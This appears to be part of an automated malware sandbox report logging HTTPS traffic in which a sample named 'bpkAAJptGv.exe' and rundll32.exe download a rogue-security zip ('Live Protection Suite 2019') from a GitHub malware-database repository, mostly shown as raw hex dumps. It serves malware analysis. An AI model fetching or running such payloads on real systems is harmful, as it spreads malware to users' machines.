                                                                                                                                                            2022-09-29 12:45:07 UTC15891INData Raw: b0 ab f4 9d 3e 5f e3 af f6 72 d1 ff b1 c4 e2 90 0c ee 70 a7 16 fc 8e 24 2b 98 cd 3b 24 e1 a2 08 cc 05 b5 b6 88 47 64 b0 76 38 f4 b3 91 ce b5 50 32 aa 00 b3 da bb b0 f7 a2 e5 67 eb da 69 4e 47 2d b5 b2 4f 0c 58 76 6f 9b e7 9a 4e dd 11 dd 95 b7 c6 88 68 e8 c1 44 6d e4 5c 84 b1 85 94 35 2b 4b 5b f6 be e4 c0 76 e2 44 4e ac bf 9a b1 4b 52 84 af 4d 81 49 da d5 84 a1 9d 65 33 c9 9a 6e f8 3e c7 46 8f 0d cc bb ea 93 37 fe 44 11 c3 6c 0d 5f 40 1b 75 c3 63 fd 50 ac da b8 81 16 b5 94 e8 80 da b2 69 59 52 c1 aa 0b e8 7f e7 38 68 9b 8d 1f e4 1f c1 e6 af 92 c2 6e 66 da e1 e2 8d 07 9b 93 09 cc 46 f0 fe eb d6 92 64 eb 48 21 79 b2 8a ea 4b f7 9a 0e 67 a5 d7 17 30 d0 37 22 bd af 18 be 93 53 99 d3 08 4c a3 d3 6c a3 59 4e 4e b7 48 33 c2 1e 6e 51 a9 99 84 58 88 f1 75 81 d4 85
                                                                                                                                                            Data Ascii: >_rp$+;$Gdv8P2giNG-OXvoNhDm\5+K[vDNKRMIe3n>F7Dl_@ucPiYR8hnfFdH!yKg07"SLlYNNH3nQXu
                                                                                                                                                            2022-09-29 12:45:07 UTC15907INData Raw: 71 fa 4a e5 9c 55 11 92 de 01 79 29 54 b3 6e 8b 18 9b 8e b3 ac 40 41 08 74 26 a2 fd 14 52 60 5a 85 ef 88 63 fb 7a cc 00 c3 b3 34 ed c0 ef 9f 08 65 61 30 a6 95 27 d5 69 57 1e 8d 79 c1 32 19 dc 99 47 90 cd 9d 34 e9 9d 41 52 1a bf 9a 66 3e 22 20 81 f9 09 bc cd bd d9 66 6f a9 bb 48 bb e2 d1 0e 45 a0 3d 8f 8c 54 31 2b 90 63 ff 88 4f b9 4d 8c 30 6a b2 8c 45 ed 23 9d 23 b4 98 e7 57 40 fe f3 eb 5d 11 28 f9 c6 02 dc 2e f6 cf ce aa f9 d0 9e 50 19 d6 db bc 02 58 a5 a1 d6 5c 46 b8 92 82 0a 77 e0 1a 63 6d 2e 01 2d b6 00 f0 99 60 11 6d c5 c2 81 03 26 7a 4a fb bd 55 fe 0d f8 93 c6 07 05 cc c6 17 ba 3d 81 31 49 e4 a4 6c 7f a8 9a 5a 96 d3 0f 63 17 d8 d8 36 eb 7b 87 17 dd 20 d3 97 66 b0 06 e9 f2 60 1b d0 67 4e b9 17 93 b3 86 0b 1f 57 5e e4 f5 29 5b 2e 0f 2d 02 74 97 a9 06
                                                                                                                                                            Data Ascii: qJUy)Tn@At&R`Zcz4ea0'iWy2G4ARf>" foHE=T1+cOM0jE##W@](.PX\Fwcm.-`m&zJU=1IlZc6{ f`gNW^)[.-t
                                                                                                                                                            2022-09-29 12:45:07 UTC15923INData Raw: 43 60 ac a7 52 13 f3 f0 e9 29 fa 9a 21 2e fa 00 c9 33 85 0b fa 93 8e a0 5b fa f8 d1 0c b0 67 76 74 5f 80 67 20 7a 7b ab 7f aa d4 55 a8 89 ce b5 ca e7 71 60 97 a9 60 37 f4 73 1c ca bb 65 db 9e 98 8f 72 2a 75 66 9d 97 da 75 d4 45 94 ad 43 1d 97 f7 bf da 3f bb 2b 49 c2 fb df 72 69 72 5a 4d 03 77 e8 30 cc fc 1a d0 92 83 6c c2 71 0c 23 49 13 3b 8c 11 ce 77 c5 a1 48 6e c9 d7 60 2b b1 54 19 17 fb 6b 2c 29 0c c7 d0 ef f7 c1 75 3a 87 f6 65 a5 3a c0 1b 93 a7 ec 09 a4 f2 b5 d5 94 fe 23 51 1c f7 aa 78 99 4f 12 81 bb 7c 10 e5 88 67 e4 37 b7 e9 4b 46 94 b5 b7 5c d7 82 b3 14 38 99 89 cd 25 da e2 0b 76 2b 19 4a 7c bf 8f 1d eb a2 3c 51 40 b6 f8 85 f7 ab 89 47 1a 4f b2 33 39 f1 95 32 18 7f 3b a5 56 ee c7 de 15 4c ea b6 1f 8b 56 d9 49 90 14 f6 86 09 ad 6b 66 47 86 a0 04 b7
                                                                                                                                                            Data Ascii: C`R)!.3[gvt_g z{Uq``7ser*ufuEC?+IrirZMw0lq#I;wHn`+Tk,)u:e:#QxO|g7KF\8%v+J|<Q@GO392;VLVIkfG
                                                                                                                                                            2022-09-29 12:45:07 UTC15939INData Raw: 9a 06 eb 24 bf 88 6b ef 9b 66 b4 c9 52 25 14 f6 15 54 46 05 a3 57 82 12 cc 15 94 ff b2 d1 0d b1 f1 51 38 71 b4 46 1c a6 a8 57 b4 4e d6 8a 04 7d e1 6c ef 09 7f aa bd cb 86 b2 c4 d2 2f a7 5d bd 61 77 dd 09 5f 1b 06 3a 99 70 63 8c 1b ac 8d 97 e5 d4 89 5e c7 8c 08 1f e4 10 45 5a 89 38 44 01 90 ef f2 4d a7 a4 e5 d9 3e e4 3a dd d3 c4 aa 07 b4 9c e0 5f ac 9d 2d 4c 49 23 61 03 bd 76 f6 78 70 0f a3 59 9e c8 6a 6c 30 6b 6b 93 6a d8 01 0a a2 c5 61 24 50 23 b6 6c 1e f2 8c 48 5f 97 d6 36 e6 7f cd fe 3b 70 e7 c4 ef 37 bf 8d 23 8a 1f 85 15 64 a5 a5 45 fc 32 9a 32 bd b0 ac 4b 44 28 d5 39 2f f9 d8 b7 5d 0b 78 f2 9d 55 c8 b0 af 2c 9d 62 35 d8 9c 8e 16 56 bb 09 03 f1 34 b6 f7 6a a7 9e 09 d2 d3 90 c0 26 c5 44 42 75 57 77 5e 49 72 09 af 14 e9 16 d2 15 37 ae 3e 9a 31 3d 79 de
                                                                                                                                                            Data Ascii: $kfR%TFWQ8qFWN}l/]aw_:pc^EZ8DM>:_-LI#avxpYjl0kkja$P#lH_6;p7#dE22KD(9/]xU,b5V4j&DBuWw^Ir7>1=y
                                                                                                                                                            2022-09-29 12:45:07 UTC15955INData Raw: b6 73 89 05 f6 40 04 3e 0f b5 5c 16 70 69 73 87 48 f8 f3 bf b9 da b1 2e e3 29 bc b2 9e b3 5b 1b 9b d3 f5 56 df d6 81 ef 8d 83 87 bf be 50 b4 42 bc b3 5b 1f 8f 69 fb 83 7b 84 45 cf c6 eb 11 f3 eb 1a 5e 48 e9 9f 71 59 87 78 7b 6f b2 f2 ea 33 d9 10 98 77 8f ed 25 32 03 36 ff 21 0c 4a 89 9a c7 61 d7 74 c2 5b 2d 22 d9 08 5b 7d eb a8 e3 35 0e 78 9c 90 55 21 0c 85 e4 47 9d 48 c5 e7 8f 4f 5d e2 32 b2 d2 7e 9e 42 e9 91 ae ad 25 b2 f8 03 05 07 93 93 38 46 b3 68 1f 97 f4 ab aa fa da ec 88 91 ac 5e 7a 77 3f ab 55 a8 ad 95 18 e7 c7 52 06 06 15 69 54 86 c5 83 e7 f1 81 53 f8 6e 49 2a d8 3e db 69 29 4e 97 56 c3 9a 1d 77 7e dc f1 8e 46 6f 26 64 36 2c 70 71 e9 24 95 13 9d f9 06 27 46 d5 de d6 36 70 a9 25 f0 0c ab 58 ba 8b 24 cc f1 cf 8f 6d b3 24 ea 2d f0 de 1c 09 37 b9 bf
                                                                                                                                                            Data Ascii: s@>\pisH.)[VPB[i{E^HqYx{o3w%26!Jat[-"[}5xU!GHO]2~B%8Fh^zw?URiTSnI*>i)NVw~Fo&d6,pq$'F6p%X$m$-7
                                                                                                                                                            2022-09-29 12:45:07 UTC15965INData Raw: 63 28 74 f9 2f 9c 48 f8 62 93 2a c3 d9 25 41 89 3b 6f d2 e8 b3 ea 80 ca db 3b f5 cb 92 31 b1 1d 0e 0a cc 40 49 c1 48 0a d9 0e d6 e5 ef ef e3 8f 97 bb dd ee 0a 55 19 2f 99 42 da 1b bb 68 a9 b1 57 a1 87 5e 98 f2 3e 79 9e ce a9 fa 49 2c 0e a2 cb 47 db 87 8e 23 59 9e b8 d4 4e a5 62 30 77 80 37 86 4c 60 6b 9f 1b 2f fe c1 50 83 6a 41 66 d9 3f 4c 4e 4c dc ef e0 0a a3 f9 c7 2a 29 95 8f 43 d5 db d2 b8 3e 86 aa 13 07 4e cb f3 15 17 9a 5b 60 fd 63 80 fb 74 c7 f1 76 a0 38 4c 91 65 23 83 2d 68 85 c3 37 0c d1 50 2e dc a6 ba a4 a0 39 a7 06 1f 2e 39 b9 b4 92 52 7d 75 f6 4d 32 fa a8 60 59 02 ba 26 d3 03 11 f3 57 0f 10 ea dc ec 89 9d 7c 79 77 8d 42 ca 27 86 11 db e8 99 eb 91 94 26 de 40 2d c4 19 91 6c 50 45 a6 71 ad 2e 3e 11 ef e7 6f 49 72 7a f5 9c a9 29 d1 33 ea 53 8b 8b
                                                                                                                                                            Data Ascii: c(t/Hb*%A;o;1@IHU/BhW^>yI,G#YNb0w7L`k/PjAf?LNL*)C>N[`ctv8Le#-h7P.9.9R}uM2`Y&W|ywB'&@-lPEq.>oIrz)3S
                                                                                                                                                            2022-09-29 12:45:07 UTC15981INData Raw: 4f 39 4e 10 60 70 41 45 67 93 58 05 cc f5 a3 75 dd 89 6f 0d 4c a3 a9 77 11 0e 68 b5 0c 6f 3f 60 d2 91 c8 fc 80 b6 f5 d5 0b 7d 8c de 86 ec db 2a 12 96 d9 e3 f5 71 15 05 5b 41 d4 c6 48 7e dd 73 85 f4 f8 a0 f9 23 8a aa 60 bc aa f9 e8 d5 ef 41 b7 02 d8 a3 9c 81 46 4a fe e2 c4 f3 37 4d c1 e7 12 54 95 2f 2b 57 83 6a 23 ae f3 3d ff bb db 4c 8d a9 82 e5 a1 ac cb 51 fc 70 c8 97 06 d5 5d 28 66 8e b4 cd 60 44 8c 67 ce fe 05 9c bf 7d 5d 3c 3e 94 c0 64 b2 cb ce f9 5f ca f0 37 04 f5 28 ec 70 f5 15 90 bf 61 1d 05 b6 65 96 45 5c 8a f9 38 2c a5 08 8f 03 44 a1 90 a1 3c 29 66 20 4f 49 9f 69 ca 17 4b db 79 3a 8a 2d ff b3 80 ac 20 78 3b 3e 8a 41 b9 91 9a e1 ca 23 8a 4d fa 30 fe 67 ed c6 ee 84 91 84 ae 54 c2 e1 aa ec a3 cf 00 c9 72 c8 49 ff 79 d8 30 57 38 f7 9d ba 71 0d 65 f7
                                                                                                                                                            Data Ascii: O9N`pAEgXuoLwho?`}*q[AH~s#`AFJ7MT/+Wj#=LQp](f`Dg}]<>d_7(paeE\8,D<)f OIiKy:- x;>A#M0gTrIy0W8qe
                                                                                                                                                            2022-09-29 12:45:07 UTC15997INData Raw: d1 bb 70 50 7c df 75 64 51 a3 ed dd 76 56 5f b6 b1 f1 9e d2 d7 c2 83 c8 ba 94 92 8f cd 13 b1 cb e3 a5 fd bf b2 00 bb ab 17 f0 7e e9 ee bc 3d 73 f1 49 59 76 68 1e 64 31 18 d3 05 f6 36 af 57 69 08 34 d6 ce 6e 11 7f ae 44 bb 96 36 3a 31 e3 5a d5 5e c8 b3 fc 32 2c d6 c4 5c fd 93 59 71 ba c8 69 9f ea 96 86 a2 02 c0 1b 6e 1d 53 13 75 25 62 c7 12 44 b3 74 04 05 3a f3 52 aa ba cf ed ce 3c 00 80 74 d7 f7 0b 9b 49 d2 87 dd 0b f3 3c 11 2c 8c 71 17 ac f5 f4 00 65 4e 70 56 db 3d 6c ac 0f 70 ff ef fd 86 36 7b f9 cd 14 f1 0c 3e aa 6a ba 57 d4 ac 99 b4 e5 ac 11 65 39 1a ff a9 52 f3 d6 ea 37 ae 4f ec b0 28 be e9 25 82 1c 51 d5 06 13 b3 d9 a1 bc ec bf c7 1f c9 68 96 03 8c 86 11 27 ae 0c 2b 15 d5 46 11 ec 2a 31 8b d1 bf 54 b7 36 8f c4 cc 79 70 07 c9 ec f4 6d 00 6d ee bb 1d
                                                                                                                                                            Data Ascii: pP|udQvV_~=sIYvhd16Wi4nD6:1Z^2,\YqinSu%bDt:R<tI<,qeNpV=lp6{>jWe9R7O(%Qh'+F*1T6ypmm
                                                                                                                                                            2022-09-29 12:45:07 UTC16013INData Raw: dd c4 af 07 76 e8 47 8e e2 47 6e 48 b3 45 d7 c1 80 db 05 37 cb ce 8f 4f 2a 36 07 ac 92 bc dd af 64 34 07 15 83 c3 ba 80 05 a3 02 df 2e 97 ad 1f 7e c6 af 06 df f4 ef 08 4b f4 68 6a 0f 9a 39 d6 9f f7 66 a7 87 76 0b 27 b8 a2 6f b3 60 13 d3 80 3a e6 c1 1c 20 70 46 1f b8 14 6e e3 1a c9 2e 26 a2 9f 53 44 eb b4 d4 22 f8 14 e7 c9 80 c9 41 5a 03 c0 53 ec 6e 73 c8 57 0a 18 8f 03 e2 49 1a 7e 0c 0a 59 04 f3 ec 94 dc 33 71 d1 a5 77 2d 39 4e 2d 65 4a 7a 4c 88 0c 7f 66 60 db fe e9 78 b8 e6 a0 5a 0e c8 c4 62 5e a5 66 1e e3 49 95 e4 1f de ba f6 5d dc 34 38 c6 5a 3f ef 06 b7 c7 ad 42 15 d2 f8 1e 6d 53 1d 6a 84 37 c2 7d 76 1b 13 f5 97 60 ca b2 29 36 aa 65 6d 49 b1 8c 29 a9 f8 bf 50 92 5a 90 9e 82 d3 73 45 c9 57 67 65 90 e3 fc 74 f8 f9 0a 2e ca fd e4 7c ba d5 9e 2a 5e bf db
                                                                                                                                                            Data Ascii: vGGnHE7O*6d4.~Khj9fv'o`: pFn.&SD"AZSnsWI~Y3qw-9N-eJzLf`xZb^fI]48Z?BmSj7}v`)6emI)PZsEWget.|*^


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            86192.168.2.649751140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:10 UTC16023OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            87140.82.121.4443192.168.2.649751C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:10 UTC16023INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:10 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:10 UTC16023INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            88192.168.2.649752185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:11 UTC16025OUTGET /Endermanch/MalwareDatabase/master/rogues/Live%20Protection%20Suite%202019.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            89185.199.110.133443192.168.2.649752C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:11 UTC16025INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1034690
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "cb139afe4c1955d7d4f5f579332cf5b73b6b41a8bade4f3525f8981ea9eb4a4c"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0807:E97B:385959:3EF852:63359357
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:11 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6944-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455511.226028,VS0,VE716
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: 62229a92c5255e3af7d9564b11db25b21790e9c6
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:11 GMT
                                                                                                                                                            Source-Age: 1
                                                                                                                                                            2022-09-29 12:45:11 UTC16026INData Raw: 50 4b 03 04 14 00 01 00 08 00 ea 63 c8 4e 15 34 5b be 10 c9 0f 00 81 0b 12 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 4c 50 53 32 30 31 39 2e 65 78 65 ec d2 bd 62 0f 4a 20 02 12 e6 89 4d 18 db 9b 9b dc 10 ae 89 ba 6b bf 4c 81 2a cc b4 82 28 9f 20 07 bb 53 a7 78 f3 2a 58 30 eb c9 eb da e8 3e b8 db 0b 27 6b 8e bc 16 6f 81 74 e9 9e 43 a0 32 be 9d dd de ca e8 fe a6 ef 69 fe e3 7f da 29 bd 73 2b a9 ea a0 32 1b 74 2f c9 db 66 e4 65 eb 0f e5 29 e6 e4 b5 0b 26 ec d0 98 45 d0 1c 5a d1 f5 79 bc d8 62 a8 26 8c c3 e4 63 82 f2 86 11 ca c4 a8 76 03 a7 cb 3e 0b 8c 64 60 7b 93 9c a1 c0 f5 56 b8 92 ef 87 91 32 db c2 91 d2 90 e3 1b f4 a9 54 2f 97 37 85 a9 fb c5 b5 67 69 1a 4c af f5 05 f1 35 0c d0 b7 ad 42 3e fb 35 e8 f1 e8 c0 cf 21 be 38 51 be 0b ca 4b 54 a5 4c 9a c4
                                                                                                                                                            Data Ascii: PKcN4[Endermanch@LPS2019.exebJ MkL*( Sx*X0>'kotC2i)s+2t/fe)&EZyb&cv>d`{V2T/7giL5B>5!8QKTL
                                                                                                                                                            2022-09-29 12:45:11 UTC16042INData Raw: 9a a8 ac 0c 77 b7 0f 29 9a 2f fe fa e7 b3 0a f8 ed f0 86 7c 55 39 1d fb 43 d5 56 ee 65 00 1a bd ac 3d 4f e7 4f dd e6 bf 22 40 6a 32 92 ee 13 7e 39 61 d2 cc b8 7c df 17 3c fe 06 55 67 a2 80 7e 6e ec bc 01 e1 da 0a 04 c2 b3 f4 f9 f7 1e c4 27 bc c8 0f 14 16 8f d0 a5 2d be 4e 0d 1c aa 0e 1e cd d1 1b a0 41 4f ac be 96 20 21 c2 53 c1 62 f4 ff 75 66 3c fb c3 ae a9 c3 cf 20 b3 cb 00 57 ad 8f 90 d1 eb c7 6d 53 62 a4 3c 75 14 1b c3 55 e3 d9 a5 51 8a 87 bd 4e 25 b9 5d bf 51 6a 60 ea fd 1c 9c 5d 79 d7 b2 92 0a 34 8b af 5c 0e 2b 13 7f 3b e6 b1 95 14 b2 87 e1 e6 cb 9d 0a c6 56 33 3a 91 cc 52 2e 92 c4 6a f5 d3 f0 1f d8 ac 24 be 0e e2 09 4c e6 86 fe 3c b6 f9 21 14 8a 07 81 1a 5a 39 d3 c9 fe ee 97 fa 26 8b ba 36 88 73 70 e8 4f f3 54 d3 f1 c9 fe ed 71 81 21 15 40 2e 4c cd
                                                                                                                                                            Data Ascii: w)/|U9CVe=OO"@j2~9a|<Ug~n'-NAO !Sbuf< WmSb<uUQN%]Qj`]y4\+;V3:R.j$L<!Z9&6spOTq!@.L
                                                                                                                                                            2022-09-29 12:45:11 UTC16058INData Raw: b7 68 ef a7 3f 6e 83 c8 08 72 5a 39 5f 6a 2a c3 08 fb bb c5 96 ac de 2c 0a 25 8e 0f 6f 4e d2 12 98 a7 9c 38 97 de 6a 0f 5a 90 3e 0a 72 f7 ef ba 9d 29 2e 51 57 10 98 e3 64 cc 18 c5 0b 51 c7 4e d0 15 c3 47 ba cf 5e 7d 21 8c 06 9e da 61 aa 43 b6 1c 2e 5a 44 90 cf cd 2a 43 f4 6f cd 73 80 81 4a d3 2a 64 85 43 c8 63 25 7c 13 68 62 b3 eb a7 57 dc a0 ff c8 ac 5c 37 91 0b 36 98 fa 5a 67 cb 14 1d 2f da 3e 48 a4 74 2c 25 89 95 6d e4 99 7f ef 1c e6 2f d3 81 5a bd f3 1b 6c 6f 79 9c 41 98 53 52 80 62 de d1 6e a4 4b 61 e3 db 89 43 02 fc 6b 21 79 b6 04 68 5a fe cb 31 0e e7 96 53 5e 2f 69 18 95 49 e3 54 77 e7 09 e0 3f 0e e5 85 07 72 77 d4 d3 d2 d1 68 63 fb 18 38 2b b4 2c be 7d 2d 2b 78 97 cd 30 60 5b ba 27 48 f4 0e 6b dc 28 14 27 cb c7 08 f9 03 f1 4c 40 04 17 aa 3c 32 aa
                                                                                                                                                            Data Ascii: h?nrZ9_j*,%oN8jZ>r).QWdQNG^}!aC.ZD*CosJ*dCc%|hbW\76Zg/>Ht,%m/ZloyASRbnKaCk!yhZ1S^/iITw?rwhc8+,}-+x0`['Hk('L@<2
                                                                                                                                                            2022-09-29 12:45:11 UTC16074INData Raw: 12 a6 ac e6 b5 64 ee 7e dd 2d 31 d2 2e e5 57 e2 8d 48 31 d2 2b 68 a2 3b 09 14 52 db 5d 5d 4e 2c d5 f4 00 e3 79 fe 72 ff 05 58 9c 72 d0 21 93 f3 2c 37 d9 9a 7d f3 82 0a 6d 2d d0 e5 44 09 ab b7 86 1a 59 cf bb 03 99 ed 1c 58 e3 e0 70 37 99 9d 81 45 67 c7 dc 16 5e 89 76 92 62 8e 86 a3 05 33 eb 4b 0f 7e 88 be 5d 30 7a 15 c4 eb c2 bd 43 51 d3 b2 f0 2f a3 fa cf 76 16 1c ac 11 47 31 4c ba a7 9c 0a fa d0 e1 aa 98 f7 b2 b9 ef 19 b3 05 be e2 15 02 22 f4 6a 73 a1 30 bd 09 c5 59 cc 2d 0e 78 23 8f dd 48 2a 08 5b 35 57 4a 59 1f 3d e4 fc bf f8 fc ab fe d9 84 42 19 d6 a8 b0 10 07 f7 26 f0 0f 13 00 27 3a 84 96 31 47 ad 73 0f 21 cb 20 54 a1 1e e1 86 f1 2d 77 44 41 96 64 56 05 be 3c 79 81 40 9c cd 18 23 f6 69 44 dc 0b 65 0a 0b 01 20 ce 71 2a 69 fb e5 5b e1 4f cd 1b 17 2c 4b
                                                                                                                                                            Data Ascii: d~-1.WH1+h;R]]N,yrXr!,7}m-DYXp7Eg^vb3K~]0zCQ/vG1L"js0Y-x#H*[5WJY=B&':1Gs! T-wDAdV<y@#iDe q*i[O,K
                                                                                                                                                            2022-09-29 12:45:11 UTC16090INData Raw: dc 79 17 7d 4e fd 8d 44 11 3b a2 4b fb 0c a4 ed 5e ce 92 fb bc d2 be a1 91 e4 9c 5b 89 60 51 9b fe 36 2b d2 2e 9b ae 35 e1 2a db 36 ba 0a 14 24 07 31 ff c6 a9 db 11 a9 30 3c a4 cc 9b ee e0 2b c7 f1 f6 42 8d f9 a7 c1 a4 dc 46 03 0e e4 18 06 44 41 c0 dd 95 30 9e 29 9c ed 0d 06 97 c2 e2 23 10 c3 2d 8b eb 01 07 4f a0 49 4d d5 e3 fe c2 2b 6a 8d 49 f8 c0 b7 0d b4 2c b6 22 55 74 1a 14 c9 67 ec 98 a9 12 c6 92 8c 0f 81 9e 66 49 58 fb 44 09 5e df 41 25 03 c0 25 77 56 e4 87 bb e4 2e 09 3d 1b eb 0c 80 7b df 0a f2 b4 21 86 4c 7c 0a fc ac af a5 27 71 1e 3f 69 49 cf a0 ca 7e d5 bb 78 f0 b8 83 f0 71 f0 02 d2 13 4a a4 24 aa c9 90 f6 99 39 24 76 04 17 ec 67 26 7d 44 75 18 29 dc 72 9d 65 0c e6 15 65 9e a4 b0 30 dc 97 b7 d8 05 91 e8 96 27 63 02 7e 07 cd db ee 41 82 77 c2 77
                                                                                                                                                            Data Ascii: y}ND;K^[`Q6+.5*6$10<+BFDA0)#-OIM+jI,"UtgfIXD^A%%wV.={!L|'q?iI~xqJ$9$vg&}Du)ree0'c~Aww
                                                                                                                                                            2022-09-29 12:45:11 UTC16106INData Raw: a4 e0 32 02 c3 29 04 17 a9 ca e0 06 94 3c 0b 9a 55 8d 93 eb 94 ae 92 43 be 5b 07 b2 ba fa 2c d4 97 3c 95 34 3a f2 78 0d bf 94 c0 8a d3 7e 3d c1 c4 0b 2e 93 a2 97 bb 54 72 d9 37 7d a4 66 69 a0 51 65 6e 3f 4e 90 ac ec 73 47 25 df 71 af 03 a2 5e ce f0 f4 23 a1 11 e7 5f 40 56 dc 90 c5 56 47 aa 29 79 69 6d bc fb be 08 a1 35 a2 c0 04 ac 69 2e e2 22 58 b3 95 24 ca 4c a3 5a 11 46 d2 dc 8d 27 c8 8d 6b dd 8b 85 e5 d9 6a 79 11 a5 2f 42 4f 84 f6 75 f5 ff 18 fa e3 11 a0 36 15 23 c4 d9 a1 9a e0 83 2c bf 85 94 8b 14 9f 04 82 84 a6 f6 07 93 4e b4 4e 98 fa f5 7a 5c 06 ec c7 6d 09 ff 94 59 30 f6 5b ad 32 85 16 b8 bd f7 f4 11 32 c3 da db 01 30 4c 66 3d 0c 9b c8 ee 2e f7 ed f1 58 54 ef ae 99 56 2d f1 f9 f0 b2 cb 70 6d 99 c8 84 31 25 fb 2b b1 74 89 b2 9e cc d6 1e 1b 2e 84 1f
                                                                                                                                                            Data Ascii: 2)<UC[,<4:x~=.Tr7}fiQen?NsG%q^#_@VVG)yim5i."X$LZF'kjy/BOu6#,NNz\mY0[220Lf=.XTV-pm1%+t.
                                                                                                                                                            2022-09-29 12:45:11 UTC16122INData Raw: 4d e7 ec 59 56 da 08 c9 ad 92 3b 0d 3c bb 7d 2f c9 ae a7 a7 56 34 57 97 7f b8 6d 79 f0 55 b2 a3 c9 22 6a c3 2f b9 78 1d c3 ee aa fa ec a9 c8 0d d4 d8 f0 a4 b7 a4 04 f1 f1 f5 65 c1 e3 07 5f 43 70 ee 92 02 ba 64 5a 57 91 05 48 f1 39 44 45 ad a1 2a 96 1e 8e 70 a9 d9 53 f3 78 f4 e7 ee 41 8c 92 47 62 cb 77 b2 49 68 23 be 10 82 73 ad d3 ed d9 9f 06 77 5e 8e 08 01 e1 d4 31 c9 b1 5d 07 6b 86 57 8d b7 a6 91 72 7b 4d ea ec 70 7c 4f aa 03 73 3e ae 34 da 62 1c 47 cb 87 0d 75 fe c7 1c db af bc 03 a4 cb 21 40 de be 35 96 dc e4 1b 26 9b 9c 31 d7 1f 93 d1 36 3d 07 88 f3 cc f5 cc 90 7c bd b8 e2 ec 43 c7 6a ab a7 47 0a 6a 71 4c 13 b7 73 d5 ef 1e d5 1f d0 d6 74 78 dc 83 bc ab 1d e6 5c 9e 5a 8c 4d 37 92 55 02 2a c3 4c b0 53 48 76 89 3e c2 8a 55 4a 77 6e 54 5c e3 73 97 48 c0
                                                                                                                                                            Data Ascii: MYV;<}/V4WmyU"j/xe_CpdZWH9DE*pSxAGbwIh#sw^1]kWr{Mp|Os>4bGu!@5&16=|CjGjqLstx\ZM7U*LSHv>UJwnT\sH
